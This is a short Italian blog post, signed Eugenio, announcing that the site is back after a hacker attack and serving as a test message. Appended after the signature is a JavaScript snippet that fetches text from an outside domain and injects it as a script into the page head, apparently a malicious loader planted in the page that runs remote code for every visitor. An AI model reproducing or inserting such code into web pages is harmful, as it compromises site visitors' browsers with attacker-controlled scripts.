Ripristino del sito
2 Ottobre 2014
Nessun commento
Article
Il sito è stato fermo per un po’ a motivo di un attacco haecker.
Con questa mail dovrebbe riprendere la funzionalità.
La mail funge da test.
Grazie,
Eugenio
var url = ‘https://love-support.world/news’; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.textContent = data; document.getElementsByTagName(‘head’)[0].appendChild(script); })